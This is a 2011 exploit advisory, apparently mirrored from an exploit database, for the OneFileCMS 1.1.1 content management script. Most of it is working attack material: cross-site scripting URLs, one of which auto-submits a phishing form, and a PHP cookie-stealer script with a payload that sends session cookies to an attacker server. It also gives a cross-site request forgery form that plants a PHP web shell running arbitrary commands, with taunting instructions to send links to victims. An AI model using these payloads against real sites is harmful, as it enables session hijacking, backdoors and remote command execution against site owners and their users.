Vulners
Lucene search
OneFileCMS 1.1.1 Cross Site Request Forgery / Cross Site Scripting
`
# Exploit Title: OneFileCMS v.1.1.1 Multiple Remote Vulnerabilities
# Google Dork: --
# Date: 21/8/2011
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/ - http://s3cure.gr
# Software Link: http://onefilecms.com/download/onefilecms_site_v1.1.1.zip
# Version: OneFileCMS v.1.1.1
# Tested on: Linux Fedora 14
===============
Description
===============
OneFileCMS is just that. It's a flat, light, one file CMS (Content Management System) entirely contained in an easy-to-implement, highly customizable, database-less PHP script. Coupling a utilitarian code editor with all the basic necessities of an FTP application, OneFileCMS can maintain a whole website completely in-browser without any external programs.
=======================================================
[!] All vulnerabilities requires authentication. [!]
=======================================================
============================================
0x01. Cross Site Scripting vulnerability
============================================
http://VICTIM_SERVER/onefilecms/onefilecms.php?p='"><marquee><h1>XSS Vulnerability<script>alert(String.fromCharCode(88,83,83))</script></h1></marquee>
http://VICTIM_SERVER/onefilecms/onefilecms.php?p='"><script>document.body.innerHTML="<style>body{visibility:hidden; background:black;}</style><div style=visibility:visible;><center><h1><font color='white'>Please fix your </font><font color='red'> XSS </font><font color='white'>!</font></h1><br>";</script>
-----------------------------------------------------------------------------
[!] Redirection to Google through the cross site scripting vulnerability [!]
------------------------------------------------------------------------------
http://VICTIM_SERVER/onefilecms/onefilecms.php?p='"><body onload="document.phising.submit();"><form name="phising" action="http://google.com"></form></body></html>
...BUT, don't forget to encode it!!!
http://localhost/onefilecms/onefilecms.php?p=27%22%3e%3c%62%6f%64%79%20%6f%6e%6c%6f%61%64%3d%22%64%6f%63%75%6d%65%6e%74%2e%70%68%69%73%69%6e%67%2e%73%75%62%6d%69%74%28%29%3b%22%3e%3c%66%6f%72%6d%20%6e%61%6d%65%3d%22%70%68%69%73%69%6e%67%22%20%61%63%74%69%6f%6e%3d%22%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%22%3e%3c%2f%66%6f%72%6d%3e%3c%2f%62%6f%64%79%3e%3c%2f%68%74%6d%6c%3e
=========================================================
0x02 Cross Site Request Foregery (CSRF) vulnerability
=========================================================
---------------------------------------
[!] Steal the cookie (sessionid) [!]
---------------------------------------
--- stealer.php ---
<?php
header ('Location:http://VICTIM_SERVER/onefilecms/onefilecms.php?f=index.php');
$cookie = $_GET['cookie'];
$log = fopen("gotit.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
--- end ---
Send this link to your victim...
http://VICTIM_SERVER/onefilecms/onefilecms.php?p='"><script>document.location="http://ATTACKER_SERVER/stealer.php?cookie="+document.cookie;</script>
...BUT, don't forget to encode it first!!!
http://VICTIM_SERVER/onefilecms/onefilecms.php?p=%27%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%41%54%54%41%43%4B%45%52%5F%53%45%52%56%45%52%2F%73%74%65%61%6C%65%72%2E%70%68%70%3F%63%6F%6F%6B%69%65%3D%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E
Now, check the "gotit.txt" file for the cookie.
Replace the value of the "sessionid" with the cookie that you already grab...
------------------------------------------
[!] Create the evil file "csrf.php" [!]
------------------------------------------
http://VICTIM_SERVER/onefilecms/onefilecms.php?p='"><html><body onload='document.f.submit()'>
<form method=post name=f action="http://localhost/onefilecms/onefilecms.php">
<input type="hidden" name="sessionid" value="HERE_PASTE_THE_VALUE">
<input type="hidden" name="filename" value="csrf.php">
<input name="content" value="<pre><?php system($_GET['cmd']);exit;?>">
<input type="submit" name="Save">
</form></body></html>
....enjoy the backdoor :)
http://VICTIM_SERVER/onefilecms/csrf.php?cmd=[command]
------------------------------------------
[!] Delete the evil file "csrf.php" [!]
------------------------------------------
http://VICTIM_SERVER/onefilecms/onefilecms.php?p='"><html><body onload='document.f.submit()'>
<form method=post name=f action="http://localhost/onefilecms/onefilecms.php">
<input type="hidden" name="sessionid" value="HERE_PASTE_THE_VALUE">
<input type="hidden" name="delete_filename" value="csrf.php">
<input type="submit" name="Yes">
</form></body></html>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Aug 2011 00:00Current
0.1Low risk
Vulners AI Score0.1